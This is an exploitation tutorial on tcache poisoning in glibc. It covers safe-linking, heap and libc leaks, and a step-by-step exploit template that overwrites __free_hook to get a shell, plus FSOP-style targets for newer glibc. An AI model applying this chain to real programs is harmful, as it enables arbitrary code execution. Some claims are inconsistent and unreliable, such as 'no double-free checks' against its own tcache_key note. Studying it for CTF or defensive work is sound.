Heap Exploitation 101: Tcache Poisoning on glibc 2.35

Understanding tcache internals and poisoning the freelist for arbitrary write on modern glibc - covering safe-linking, heap and libc leaks, and a complete exploit walk-through against a use-after-free.

Tcache Overview

Since glibc 2.26, the per-thread cache holds up to 7 freed chunks per size class in a singly-linked LIFO list. Poisoning the forward pointer redirects where the next allocation lands.

The tcache (thread-local caching bin) was introduced for performance - most allocations are small and short-lived, so an unsynchronised per-thread free list dramatically reduces lock contention compared to the older fastbin / smallbin paths. From an attacker’s perspective, this same simplicity makes it the cleanest primitive in modern heap exploitation: there are no double-free checks, no size sanity, no bin-list integrity checks beyond tcache_count, and no coalescing. If you can land a single write into the right place, you own the next allocation of that size class.

Internal Layout

When a chunk is freed and lands in the tcache, glibc reuses the user data area to form a singly-linked list. The first 8 bytes (where the user used to write) become the next pointer to the previous chunk in the list, and the second 8 bytes become key - a per-thread sentinel meant to detect double-frees.

Freed chunk in tcache:
+--------------+--------------+
| prev_size    | size         |   ← chunk header (16 bytes on x64)
+--------------+--------------+
| next (fd)    | key          |   ← user-data area, repurposed
+--------------+--------------+
| ... unused user data ...    |
+--------------+--------------+

The corresponding tcache_perthread_struct lives at the start of the heap and carries one entry per size class:

typedef struct tcache_perthread_struct {
    uint16_t counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];   // Per-size LIFO heads
} tcache_perthread_struct;

malloc(n) for a tcache-eligible size first checks entries[idx], and if non-NULL, unlinks the head: entries[idx] = head->next. That single dereference is exactly what poisoning targets - control head->next and the next allocation of that size returns wherever you point.

Size Classes Cached

On x64, tcache caches sizes from 0x20 (smallest user-callable malloc) up to 0x410 in 0x10 increments - 64 size classes total, 7 chunks each, so a thread can keep 448 cached chunks before falling back to fastbin/unsorted bin paths.

The Core Primitive

The classic tcache-poison flow assumes a use-after-free or off-by-one that lets you write to a freed chunk’s next pointer:

Free A  → tcache[idx] = A,        A->next = NULL
Free B  → tcache[idx] = B,        B->next = A
UAF write on B: overwrite B->next = TARGET
malloc() → returns B
malloc() → returns TARGET   ← arbitrary allocation

Step 5 is the magic moment. Whatever TARGET is - __free_hook, __malloc_hook, a function pointer in .bss, an entry in a vtable, the _IO_2_1_stdout_ FILE struct - the next allocation lands there, and you can write controlled bytes to it.

Safe-Linking (glibc >= 2.32)

Modern glibc XORs the forward pointer with chunk_addr >> 12. You need a heap leak to compute the correct mangled pointer.

This mitigation, introduced by Eyal Itkin, was inspired by the Linux kernel’s freelist_random / random_kmalloc_caches. The idea is brutally simple: instead of storing a raw next pointer, glibc stores PROTECT_PTR(pos, ptr) defined as:

#define PROTECT_PTR(pos, ptr)   ((__typeof(ptr))((((size_t)pos) >> 12) ^ (size_t)ptr))
#define REVEAL_PTR(ptr)         PROTECT_PTR(&ptr, ptr)

The pos argument is the address of the slot holding the pointer (i.e. the chunk address itself). Two consequences:

You can’t blindly write a target address. Without knowing where the current chunk lives in the heap, you cannot pre-compute the XOR mask, so a single arbitrary write into next produces garbage.
It’s not memory-safe alignment-checked unless you target a 16-byte-aligned slot. Since glibc 2.32, it also asserts that the unmasked pointer is 16-byte aligned (if (__glibc_unlikely(!aligned_OK(REVEAL_PTR(victim)))) → abort). So your forged target must be aligned, which rules out some “land in the middle of a buffer” tricks but not others.

In short: safe-linking turns “one UAF write = arbitrary allocation” into “one UAF write plus a heap leak = arbitrary allocation”. It is a speed bump, not a wall.

Computing the Mask

Given a heap leak heap_addr (any address inside the heap is fine - page-align down to 0x1000), and a target target_addr:

def mangle(heap_addr_of_chunk, target_addr):
    return (heap_addr_of_chunk >> 12) ^ target_addr

You need the address of the chunk whose next field you are corrupting, not the heap base. With a leak from the unsorted bin (libc) or any heap-resident pointer (e.g. a freed chunk’s fd before tcache absorbs it), you can derive this.

Exploit Flow

Leak heap address (for safe-linking bypass)
Leak libc (via unsorted bin)
Tcache poison → overwrite __free_hook with system
Free a chunk containing “/bin/sh” → shell

Each step deserves its own walk-through, because the order matters and the chunks must be sized carefully.

Step 1 - Heap Leak

The cleanest source is the tcache itself. When you free chunk A and then chunk B into the same size class, B’s next field becomes mangle(&B, A). If you can read B (via a print/show primitive on the freed object - UAF or off-by-null-terminator) you read the mangled value. Knowing that next should equal A’s address XOR (&B >> 12), the page-aligned heap base falls out immediately, because chunk addresses share the high bits with the heap base.

Alternative leak sources:

Unsorted bin chunk: chunks larger than 0x410 (above the tcache range) freed without immediate reuse end up in the unsorted bin, which uses bk/fd pointing into main_arena. The first such chunk is also linked to the next chunk in the heap, giving you both libc and heap leaks in one read.
Large bin chunks: contain fd_nextsize / bk_nextsize pointers - also yield heap addresses.
Tcache stash mechanism (glibc ≥ 2.29): when the tcache is partially full and a smallbin allocation happens, glibc stashes extra chunks back into tcache, and their bk pointers contain libc-side addresses.

Step 2 - Libc Leak

To call system, execve, or write a one-gadget, you need libc base. The standard trick is to allocate a chunk larger than 0x410 (above tcache), free it, then allocate again to reclaim it - at which point its fd/bk (which were pointing into main_arena) are still readable in the user data area if you only consumed part of the chunk:

// 1. Allocate a 0x500-byte chunk (above tcache range)
A = malloc(0x500);
B = malloc(0x20);   // guard chunk to prevent top-merge

// 2. Free A - goes into unsorted bin, fd/bk now point into main_arena
free(A);

// 3. Read A back (UAF) - first 8 bytes are an address inside libc
libc_leak = read(A, 8);
libc_base = libc_leak - MAIN_ARENA_OFFSET;

MAIN_ARENA_OFFSET is constant per glibc build and easy to derive from a copy of libc.so.6.

Step 3 - Tcache Poison

With both leaks, target __free_hook. It’s a writable function pointer in libc that, if non-NULL, is called by free() with the chunk pointer as its argument - perfect for system("/bin/sh") because the chunk pointer becomes the argument.

# Two same-size chunks
a = malloc(0x40)
b = malloc(0x40)

# Free both into tcache: head = b, b->next = mangle(&b, a)
free(a)
free(b)

# UAF write on b: overwrite next
free_hook = libc_base + LIBC_FREE_HOOK_OFFSET
mangled  = (heap_addr_of_b >> 12) ^ free_hook
write(b, p64(mangled))

# Drain tcache
malloc(0x40)            # returns b
target = malloc(0x40)   # returns __free_hook  ← arbitrary allocation
write(target, p64(libc_base + LIBC_SYSTEM_OFFSET))

Step 4 - Trigger

Allocate a chunk whose user data starts with "/bin/sh\0", then free it. The free() call now jumps to __free_hook, which has been replaced with system, with the user-data pointer (/bin/sh) as its first argument:

sh = malloc(0x40)
write(sh, b"/bin/sh\x00")
free(sh)        # → system("/bin/sh") → shell

Hook Removal in glibc 2.34+

__malloc_hook and __free_hook were removed in glibc 2.34. On a modern target you can no longer use this exact landing pad. The current canonical replacements are:

FILE struct exploitation: poison _IO_list_all to a fake _IO_FILE whose vtable points to controlled memory, then trigger any printf/fwrite/exit-flush. Search for “House of Apple 2”, “House of Banana”, “FSOP”.
__exit_funcs: glibc registers a linked list of functions to call at process exit. The list pointers are mangled with PTR_DEMANGLE (XOR + ROR with tls.pointer_guard), so you also need a TLS leak.
stdout _IO_2_1_stdout_->_wide_data->_wide_vtable: a particularly clean target post-2.34, exercised by FSOP chains.
tls_dtor_list: another callback list reachable at exit if __cxa_thread_atexit_impl was used.

The high-level pattern is the same: tcache-poison your way to writing a fake vtable pointer into a structure that is dereferenced for an indirect call.

Defensive Notes

Mitigation	Effect on tcache-poison
Safe-linking (2.32+)	Requires heap leak
`tcache_count` integrity check (2.29+)	Counter incremented on free; over-allocation traps. Not a real obstacle.
`tcache_key` double-free check (2.29+)	Compares `key` to per-thread random; freeing twice without changing `key` aborts.
16-byte alignment check (2.32+)	Forged target addresses must be 16-aligned
`__malloc_hook`/`__free_hook` removal (2.34+)	Forces FILE-stream / `__exit_funcs` chains
`_FORTIFY_SOURCE=2/3`	Catches a handful of overflow primitives but not the freelist write
`MALLOC_CHECK_=3` env	Strong overflow/double-free detection - opt-in only

Modern heap exploitation is all about leaking the right addresses. Once you have heap base + libc base, the rest is mechanical. Tcache is the simplest primitive in the allocator and the first one you should master before diving into fastbin AC, unsorted-bin attacks, large-bin tricks, or House-of-* recipes.